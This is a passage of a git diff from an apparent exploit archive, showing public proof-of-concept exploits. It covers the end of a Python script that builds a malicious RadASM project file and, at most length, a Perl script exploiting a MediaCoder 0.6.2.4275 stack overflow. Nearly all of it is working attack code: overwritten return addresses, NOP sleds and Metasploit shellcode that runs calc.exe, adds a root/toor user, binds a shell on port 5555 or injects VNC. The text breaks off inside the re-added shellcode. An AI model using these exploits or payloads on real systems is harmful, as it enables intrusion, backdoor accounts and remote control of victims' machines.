+eip = "\x5D\x38\x82\x7C" # KERNEL32.DLL ESP In Windows SP2 EN
+nopsled = "\x90"*20
+#win32_exec -  EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
+shellcode = (
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
+"\x42\x50\x42\x30\x42\x30\x4b\x58\x45\x54\x4e\x43\x4b\x48\x4e\x57"
+"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x58\x4f\x34\x4a\x31\x4b\x38"
+"\x4f\x45\x42\x42\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x53\x4b\x48"
+"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c"
+"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
+"\x46\x4f\x4b\x33\x46\x45\x46\x32\x46\x50\x45\x57\x45\x4e\x4b\x58"
+"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x44"
+"\x4b\x48\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48"
+"\x41\x30\x4b\x4e\x49\x38\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x53"
+"\x42\x4c\x46\x56\x4b\x48\x42\x54\x42\x53\x45\x58\x42\x4c\x4a\x37"
+"\x4e\x50\x4b\x58\x42\x44\x4e\x30\x4b\x48\x42\x57\x4e\x51\x4d\x4a"
+"\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x58\x42\x38\x42\x4b"
+"\x42\x50\x42\x30\x42\x50\x4b\x38\x4a\x46\x4e\x53\x4f\x45\x41\x43"
+"\x48\x4f\x42\x56\x48\x55\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x47"
+"\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x45\x4a\x46\x4a\x59"
+"\x50\x4f\x4c\x48\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x36"
+"\x4e\x46\x43\x46\x50\x42\x45\x46\x4a\x47\x45\x36\x42\x30\x5a"
+)
+stack =  header + zAx + eip + nopsled + shellcode + nopsled
+file=open("zAx.rap","w")
+file.write(stack)
+file.close()
+raw_input("\nExploit file created!, Now Go to RadASM and Open Our Devil Project :D\n")
+
+# milw0rm.com [2009-03-09]
diff --git a/platforms/windows/local/8178.pl b/platforms/windows/local/8178.pl
index e60a77fcf..eff063b87 100755
--- a/platforms/windows/local/8178.pl
+++ b/platforms/windows/local/8178.pl
@@ -1,205 +1,205 @@
-#!/usr/bin/perl
-# MediaCoder 0.6.2.4275 Universal Stack Based Overflow
-# By Stack
-# Mountassif Moad
-# cat Greatz.txt
-# Jadi-Chel7 & Mr.Safa7 & Houssamix & Simo-Soft & DDos & Simo64 & G0rillaz & Issam & Sec-Alert & & Bohayra & j0rd4n14n.r1z
-# Webug & Travis-Barker & Keyo & General l0s3r & NeoCoderz & welahima b9ite 3arefe chkoune akhore rani tansa :d
-# ahe nsite big thnx to Str0ke and thanks you for all patience and your advice & support
-my $header= "\x23\x45\x58\x54\x4D\x33\x55\x0D\x0A\x23\x45\x58\x54\x49\x4E\x46".
-            "\x3A\x33\x3A\x35\x30\x2C\x4C\x61\x6D\x62\x20\x4F\x66\x20\x47\x6F".
-            "\x64\x20\x2D\x20\x53\x65\x74\x20\x54\x6F\x20\x46\x61\x69\x6C\x20".
-            "\x0D\x0A\x44\x3A\x5C";
-   
-my $junk  = "\x41" x 254;
-my $ret   = "\x93\x43\x92\x7c"; # Universal return adress :d
-my $nop   = "\x90" x 25;
-# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
-my $calc_shell =
-    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
-    "\x42\x50\x42\x50\x42\x30\x4b\x48\x45\x34\x4e\x43\x4b\x38\x4e\x47".
-    "\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48".
-    "\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x34\x4b\x48\x46\x53\x4b\x48".
-    "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c".
-    "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
-    "\x46\x4f\x4b\x53\x46\x55\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x38".
-    "\x4f\x45\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54".
-    "\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58".
-    "\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x30\x43\x4c\x41\x43".
-    "\x42\x4c\x46\x36\x4b\x58\x42\x34\x42\x33\x45\x48\x42\x4c\x4a\x57".
-    "\x4e\x30\x4b\x48\x42\x44\x4e\x30\x4b\x48\x42\x47\x4e\x41\x4d\x4a".
-    "\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b".
-    "\x42\x50\x42\x50\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x45\x41\x33".
-    "\x48\x4f\x42\x36\x48\x45\x49\x48\x4a\x4f\x43\x38\x42\x4c\x4b\x47".
-    "\x42\x55\x4a\x46\x42\x4f\x4c\x38\x46\x50\x4f\x55\x4a\x36\x4a\x39".
-    "\x50\x4f\x4c\x38\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x36".
-    "\x4e\x56\x43\x36\x50\x32\x45\x36\x4a\x57\x45\x56\x42\x30\x5a";
-
-# win32_adduser -  PASS=toor EXITFUNC=seh USER=root Size=489 Encoder=PexAlphaNum http://metasploit.com
-my $adduser_shell =
-    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
-    "\x42\x30\x42\x30\x42\x50\x4b\x58\x45\x54\x4e\x43\x4b\x58\x4e\x37".
-    "\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x31\x4b\x48".
-    "\x4f\x55\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x38\x46\x43\x4b\x58".
-    "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c".
-    "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e".
-    "\x46\x4f\x4b\x53\x46\x45\x46\x52\x46\x30\x45\x47\x45\x4e\x4b\x58".
-    "\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x30\x4b\x54".
-    "\x4b\x58\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
-    "\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x53".
-    "\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x37".
-    "\x4e\x30\x4b\x48\x42\x34\x4e\x30\x4b\x58\x42\x47\x4e\x51\x4d\x4a".
-    "\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
-    "\x42\x30\x42\x50\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53".
-    "\x48\x4f\x42\x46\x48\x55\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
-    "\x42\x45\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x56\x4a\x49".
-    "\x50\x4f\x4c\x48\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x36\x4d\x46".
-    "\x46\x36\x50\x52\x45\x56\x4a\x57\x45\x36\x42\x52\x4f\x42\x43\x56".
-    "\x42\x42\x50\x56\x45\x36\x46\x37\x42\x52\x45\x37\x43\x47\x45\x46".
-    "\x44\x57\x42\x52\x44\x57\x4f\x56\x4f\x56\x46\x37\x42\x42\x46\x57".
-    "\x4f\x46\x4f\x46\x44\x37\x42\x42\x4f\x52\x41\x44\x46\x34\x46\x34".
-    "\x42\x42\x48\x32\x48\x52\x42\x32\x50\x36\x45\x46\x46\x47\x42\x42".
-    "\x4e\x56\x4f\x56\x43\x46\x41\x56\x4e\x46\x47\x36\x44\x37\x4f\x56".
-    "\x45\x47\x42\x57\x42\x42\x41\x44\x46\x36\x4d\x46\x49\x46\x50\x56".
-    "\x49\x36\x43\x57\x46\x37\x44\x37\x41\x56\x46\x37\x4f\x46\x44\x57".
-    "\x43\x47\x42\x32\x44\x57\x4f\x56\x4f\x56\x46\x47\x42\x32\x4f\x32".
-    "\x41\x44\x46\x44\x46\x34\x42\x50\x5a";
-
-# win32_bind -  EXITFUNC=seh LPORT=5555 Size=709 Encoder=PexAlphaNum http://metasploit.com
-my $bind_shell =
-    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e".
-    "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38".
-    "\x4e\x46\x46\x42\x46\x32\x4b\x48\x45\x54\x4e\x53\x4b\x58\x4e\x47".
-    "\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x31\x4b\x58".
-    "\x4f\x55\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x38".
-    "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x38\x42\x4c".
-    "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-    "\x46\x4f\x4b\x43\x46\x45\x46\x52\x4a\x52\x45\x37\x45\x4e\x4b\x48".
-    "\x4f\x45\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x38\x4e\x50\x4b\x34".
-    "\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x43\x50\x4e\x32\x4b\x38".
-    "\x49\x58\x4e\x56\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d".
-    "\x46\x36\x4b\x38\x43\x34\x42\x53\x4b\x58\x42\x34\x4e\x30\x4b\x48".
-    "\x42\x47\x4e\x51\x4d\x4a\x4b\x58\x42\x54\x4a\x50\x50\x45\x4a\x56".
-    "\x50\x58\x50\x44\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56".
-    "\x43\x35\x48\x46\x4a\x46\x43\x43\x44\x53\x4a\x36\x47\x37\x43\x47".
-    "\x44\x33\x4f\x45\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e".
-    "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x45\x49\x58\x45\x4e".
-    "\x48\x46\x41\x38\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x46\x44\x30".
-    "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45".
-    "\x4f\x4f\x48\x4d\x43\x55\x43\x35\x43\x45\x43\x55\x43\x55\x43\x34".
-    "\x43\x45\x43\x54\x43\x35\x4f\x4f\x42\x4d\x48\x36\x4a\x36\x45\x41".
-    "\x43\x4b\x48\x36\x43\x45\x49\x38\x41\x4e\x45\x49\x4a\x56\x46\x4a".
-    "\x4c\x41\x42\x57\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x41".
-    "\x41\x55\x45\x45\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x52".
-    "\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d".
-    "\x4a\x36\x45\x4e\x49\x44\x48\x58\x49\x44\x47\x45\x4f\x4f\x48\x4d".
-    "\x42\x45\x46\x35\x46\x55\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x46".
-    "\x47\x4e\x49\x57\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45".
-    "\x4f\x4f\x42\x4d\x48\x36\x4c\x46\x46\x36\x48\x36\x4a\x56\x43\x36".
-    "\x4d\x36\x49\x58\x45\x4e\x4c\x56\x42\x55\x49\x35\x49\x52\x4e\x4c".
-    "\x49\x58\x47\x4e\x4c\x36\x46\x34\x49\x48\x44\x4e\x41\x43\x42\x4c".
-    "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x54\x4e\x32".
-    "\x43\x39\x4d\x38\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56".
-    "\x44\x47\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x34\x4f\x4f".
-    "\x48\x4d\x4b\x35\x47\x35\x44\x45\x41\x55\x41\x35\x41\x55\x4c\x36".
-    "\x41\x30\x41\x55\x41\x35\x45\x35\x41\x45\x4f\x4f\x42\x4d\x4a\x46".
-    "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x46".
-    "\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x45\x4e\x4f".
-    "\x43\x38\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d".
-    "\x4a\x56\x42\x4f\x4c\x58\x46\x30\x4f\x55\x43\x35\x4f\x4f\x48\x4d".
-    "\x4f\x4f\x42\x4d\x5a";
-
-# win32_bind_vncinject -  VNCDLL=/home/opcode/msfweb/framework/data/vncdll.dll EXITFUNC=seh AUTOVNC=1 VNCPORT=5900 LPORT=4444 Size=649 Encoder=PexAlphaNum http://metasploit.com
-my $bind_vncinject =
-       "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4a\x4e\x48\x55\x42\x50".
-    "\x42\x30\x42\x30\x43\x55\x45\x35\x48\x45\x47\x45\x4b\x38\x4e\x36".
-    "\x46\x42\x4a\x31\x4b\x38\x45\x54\x4e\x33\x4b\x48\x46\x55\x45\x30".
-    "\x4a\x47\x41\x50\x4c\x4e\x4b\x58\x4c\x54\x4a\x31\x4b\x48\x4c\x55".
-    "\x42\x42\x41\x50\x4b\x4e\x43\x4e\x44\x43\x49\x54\x4b\x58\x46\x33".
-    "\x4b\x48\x41\x30\x50\x4e\x41\x33\x4f\x4f\x4e\x4f\x41\x43\x42\x4c".
-    "\x4e\x4a\x4a\x53\x42\x4e\x46\x57\x47\x30\x41\x4c\x4f\x4c\x4d\x30".
-    "\x41\x30\x47\x4c\x4b\x4e\x44\x4f\x4b\x33\x4e\x47\x46\x42\x46\x51".
-    "\x45\x37\x41\x4e\x4b\x38\x4c\x35\x46\x52\x41\x30\x4b\x4e\x48\x56".
-    "\x4b\x58\x4e\x50\x4b\x54\x4b\x48\x4c\x55\x4e\x51\x41\x30\x4b\x4e".
-    "\x4b\x58\x46\x30\x4b\x58\x41\x50\x4a\x4e\x4b\x4e\x44\x50\x41\x43".
-    "\x42\x4c\x4f\x35\x50\x35\x4d\x35\x4b\x45\x44\x4c\x4a\x50\x42\x50".
-    "\x50\x55\x4c\x36\x42\x33\x49\x55\x46\x46\x4b\x58\x49\x31\x4b\x38".
-    "\x4b\x45\x4e\x50\x4b\x38\x4b\x35\x4e\x31\x4b\x48\x4b\x51\x4b\x58".
-    "\x4b\x45\x4a\x30\x43\x55\x4a\x56\x50\x38\x50\x34\x50\x50\x4e\x4e".
-    "\x4f\x4f\x48\x4d\x49\x48\x47\x4c\x41\x58\x4e\x4e\x42\x50\x41\x50".
-    "\x42\x50\x42\x30\x47\x45\x48\x55\x43\x45\x49\x38\x45\x4e\x4a\x4e".
-    "\x47\x52\x42\x30\x42\x30\x42\x30\x42\x59\x41\x50\x42\x30\x42\x50".
-    "\x48\x4b\x49\x51\x4a\x51\x47\x4e\x46\x4a\x49\x31\x42\x47\x49\x4e".
-    "\x45\x4e\x49\x54\x48\x58\x49\x54\x46\x4a\x4c\x51\x42\x37\x47\x4c".
-    "\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x49\x4d\x49\x50\x45\x4f\x4d\x4a".
-    "\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x43\x47\x45\x43\x35\x44\x33\x4f\x45".
-    "\x43\x33\x44\x43\x42\x30\x4b\x45\x4d\x38\x4b\x34\x42\x42\x41\x55".
-    "\x4f\x4f\x47\x4d\x49\x58\x4f\x4d\x49\x38\x43\x4c\x4d\x58\x45\x47".
-    "\x46\x41\x4c\x36\x47\x30\x49\x45\x41\x35\x43\x45\x4f\x4f\x46\x43".
-    "\x4f\x38\x4f\x4f\x45\x35\x46\x50\x49\x35\x49\x58\x46\x50\x50\x48".
-    "\x44\x4e\x44\x4f\x4b\x32\x47\x52\x46\x35\x4f\x4f\x47\x43\x4f\x4f".
-    "\x45\x35\x42\x43\x41\x53\x42\x4c\x42\x45\x42\x35\x42\x35\x42\x55".
-    "\x42\x54\x42\x55\x42\x44\x42\x35\x4f\x4f\x45\x45\x4e\x32\x49\x48".
-    "\x47\x4c\x41\x53\x4b\x4d\x43\x45\x43\x45\x4a\x46\x44\x30\x42\x50".
-    "\x41\x31\x4e\x55\x49\x48\x42\x4e\x4c\x36\x42\x31\x42\x35\x47\x55".
-    "\x4f\x4f\x45\x35\x46\x32\x43\x55\x47\x45\x4f\x4f\x45\x45\x4a\x32".
-    "\x43\x55\x46\x35\x47\x45\x4f\x4f\x45\x55\x42\x32\x49\x48\x47\x4c".
-    "\x41\x58\x4e\x4e\x42\x50\x42\x31\x42\x50\x42\x50\x49\x58\x43\x4e".
-    "\x4c\x46\x42\x50\x4a\x46\x42\x30\x42\x51\x42\x30\x42\x30\x43\x35".
-    "\x47\x45\x4f\x4f\x45\x35\x4a\x31\x41\x58\x4e\x4e\x42\x30\x46\x30".
-    "\x42\x30\x42\x30\x4f\x4f\x43\x4d\x5a";
-$id = $ARGV[0];
-if ($id==1){
-print "$header.$junk.$ret.$nop.$calc_shell.$nop";
-exit;
-}
-if ($id==2){
-print "$header.$junk.$ret.$nop.$adduser_shell.$nop";
-exit;
-}
-if ($id==3){
-print "$header.$junk.$ret.$nop.$bind_shell.$nop";
-exit;
-}
-if ($id==4){
-print "$header.$junk.$ret.$nop.$bind_vncinject.$nop";
-exit;
-}
-print "\n";
-print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
-print " +++                                                        +++\n";
-print " +++                                                        +++\n";
-print " +++ MediaCoder 0.6.2.4275 Universal Stack-Based Overflow   +++\n";
-print " +++ Written By Stack                                       +++\n";
-print " +++                                                        +++\n";
-print " +++   Usage Ex.: perl $0 1 >>Exploit.m3u              +++\n";
-print " +++                                                        +++\n";
-print " +++  Options:                                              +++\n";
-print " +++          1 - win32_exec calc.exe                       +++\n";
-print " +++          2 - win32_adduser Pass=toor User=root         +++\n";
-print " +++          3 - win32_bind Port 5555                      +++\n";
-print " +++          4 - win32_bind_vncinject Port 5900            +++\n";
-print " +++                                                        +++\n";
-print " +++                                                        +++\n";
-print " +++                                                        +++\n";
-print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
-exit;
-#EOF
-
-# milw0rm.com [2009-03-09]
+#!/usr/bin/perl
+# MediaCoder 0.6.2.4275 Universal Stack Based Overflow
+# By Stack
+# Mountassif Moad
+# cat Greatz.txt
+# Jadi-Chel7 & Mr.Safa7 & Houssamix & Simo-Soft & DDos & Simo64 & G0rillaz & Issam & Sec-Alert & & Bohayra & j0rd4n14n.r1z
+# Webug & Travis-Barker & Keyo & General l0s3r & NeoCoderz & welahima b9ite 3arefe chkoune akhore rani tansa :d
+# ahe nsite big thnx to Str0ke and thanks you for all patience and your advice & support
+my $header= "\x23\x45\x58\x54\x4D\x33\x55\x0D\x0A\x23\x45\x58\x54\x49\x4E\x46".
+            "\x3A\x33\x3A\x35\x30\x2C\x4C\x61\x6D\x62\x20\x4F\x66\x20\x47\x6F".
+            "\x64\x20\x2D\x20\x53\x65\x74\x20\x54\x6F\x20\x46\x61\x69\x6C\x20".
+            "\x0D\x0A\x44\x3A\x5C";
+   
+my $junk  = "\x41" x 254;
+my $ret   = "\x93\x43\x92\x7c"; # Universal return adress :d
+my $nop   = "\x90" x 25;
+# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
+my $calc_shell =
+    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
+    "\x42\x50\x42\x50\x42\x30\x4b\x48\x45\x34\x4e\x43\x4b\x38\x4e\x47".
+    "\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48".
+    "\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x34\x4b\x48\x46\x53\x4b\x48".
+    "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c".
+    "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
+    "\x46\x4f\x4b\x53\x46\x55\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x38".
+    "\x4f\x45\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54".
+    "\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58".
+    "\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x30\x43\x4c\x41\x43".
+    "\x42\x4c\x46\x36\x4b\x58\x42\x34\x42\x33\x45\x48\x42\x4c\x4a\x57".
+    "\x4e\x30\x4b\x48\x42\x44\x4e\x30\x4b\x48\x42\x47\x4e\x41\x4d\x4a".
+    "\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b".
+    "\x42\x50\x42\x50\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x45\x41\x33".
+    "\x48\x4f\x42\x36\x48\x45\x49\x48\x4a\x4f\x43\x38\x42\x4c\x4b\x47".
+    "\x42\x55\x4a\x46\x42\x4f\x4c\x38\x46\x50\x4f\x55\x4a\x36\x4a\x39".
+    "\x50\x4f\x4c\x38\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x36".
+    "\x4e\x56\x43\x36\x50\x32\x45\x36\x4a\x57\x45\x56\x42\x30\x5a";
+
+# win32_adduser -  PASS=toor EXITFUNC=seh USER=root Size=489 Encoder=PexAlphaNum http://metasploit.com
+my $adduser_shell =
+    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
+    "\x42\x30\x42\x30\x42\x50\x4b\x58\x45\x54\x4e\x43\x4b\x58\x4e\x37".
+    "\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x31\x4b\x48".
+    "\x4f\x55\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x38\x46\x43\x4b\x58".
+    "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c".
+    "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e".
+    "\x46\x4f\x4b\x53\x46\x45\x46\x52\x46\x30\x45\x47\x45\x4e\x4b\x58".
+    "\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x30\x4b\x54".
+    "\x4b\x58\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
+    "\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x53".
+    "\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x37".
+    "\x4e\x30\x4b\x48\x42\x34\x4e\x30\x4b\x58\x42\x47\x4e\x51\x4d\x4a".
+    "\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
+    "\x42\x30\x42\x50\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53".
+    "\x48\x4f\x42\x46\x48\x55\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
+    "\x42\x45\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x56\x4a\x49".
+    "\x50\x4f\x4c\x48\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x36\x4d\x46".
+    "\x46\x36\x50\x52\x45\x56\x4a\x57\x45\x36\x42\x52\x4f\x42\x43\x56".
+    "\x42\x42\x50\x56\x45\x36\x46\x37\x42\x52\x45\x37\x43\x47\x45\x46".
+    "\x44\x57\x42\x52\x44\x57\x4f\x56\x4f\x56\x46\x37\x42\x42\x46\x57".
+    "\x4f\x46\x4f\x46\x44\x37\x42\x42\x4f\x52\x41\x44\x46\x34\x46\x34".
+    "\x42\x42\x48\x32\x48\x52\x42\x32\x50\x36\x45\x46\x46\x47\x42\x42".
+    "\x4e\x56\x4f\x56\x43\x46\x41\x56\x4e\x46\x47\x36\x44\x37\x4f\x56".
+    "\x45\x47\x42\x57\x42\x42\x41\x44\x46\x36\x4d\x46\x49\x46\x50\x56".
+    "\x49\x36\x43\x57\x46\x37\x44\x37\x41\x56\x46\x37\x4f\x46\x44\x57".
+    "\x43\x47\x42\x32\x44\x57\x4f\x56\x4f\x56\x46\x47\x42\x32\x4f\x32".
+    "\x41\x44\x46\x44\x46\x34\x42\x50\x5a";
+
+# win32_bind -  EXITFUNC=seh LPORT=5555 Size=709 Encoder=PexAlphaNum http://metasploit.com
+my $bind_shell =
+    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
